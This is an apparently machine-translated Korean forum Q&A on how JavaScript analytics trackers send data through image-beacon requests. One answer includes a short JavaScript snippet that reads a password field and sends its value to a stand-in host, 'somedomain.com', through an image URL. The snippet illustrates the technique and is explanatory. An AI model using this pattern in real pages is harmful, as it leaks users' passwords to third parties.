누구나 Google Analytics 또는 Clicky가 어떻게 작동하는지 알고 있습니까?누구든지 Javascript Web Analytics 추적기가 작동하는 방법을 알고 있습니까?
전체 http://static.getclicky.com/js 파일을 검색하여 서버 요청을 찾지 못했습니다. 자체 보안을 손상시키지 않으면 서 데이터를 어떻게 전송합니까? 그렇지 않으면 사용자는 js를 수정하여 잘못된 데이터를 보낼 수 있습니다.
이미지 : 이러한 라이브러리는 원하는 모든 추적 정보를 인코딩하고 이미지 URL에 추가 한 다음 이미지를 요청하여 트렌드를 전송합니다. 해당 이미지 파일의 서버 측 구문 분석은 정보를 디코딩합니다.
var t = document.getElementById('p').value;
var i = document.createElement('img');
i.src = 'http://somedomain.com/imagescript.php?p=' + t;
<input type='password' id='p' />
이 자바 스크립트 크로스 사이트 제한을 위반하여 내용을 보낼 수 있습니다 :
당신이 somedomain.com에 mydomain.com에서 보내려는 암호 필드 있다고 가정이미지에 교차 사이트 스크립팅 제한이 적용되지 않으며 JavaScript로 이미지 URL 요청을 작성할 때 전 세계 브라우저 또는 로직으로 모든 가능성을 설명 할 수 없습니다. GA가 윤리적이며 양식 필드를 방해하지 않는 것이 행운이라고 가정 해 보겠습니다.
와우 멋진 곳입니다. 하지만 i.src는 어떻게됩니까? 버려 졌습니까? 그리고 그들이 사용자/브라우저 정보/참조 URL 등의 IP 주소 예를 들어 데이터를 가져와야하는 경우 PHP 파일이나 자바 스크립트로 끝났습니까? –
일부 정보 (브라우저 에이전트, IP 주소, 가능하면 URL 참조)가 HTTP 헤더에서 수동적으로 수집됩니다. 페이지 제목과 같은 기타 정보는 이미지 URL에 인코딩되며 서버 측 처리는이를 디코딩합니다. – pp19dd
답장을 보내 주셔서 감사합니다. 그러나 많은 양의 변수를 보내기 위해 왜 그렇게 많은 코딩을해야할까요? 나는 그것이 무엇인지 알 수는 없지만 사기성 항목을 피하기 위해 데이터가 전송되기 전에 데이터가 인코딩 된 것 같습니다. –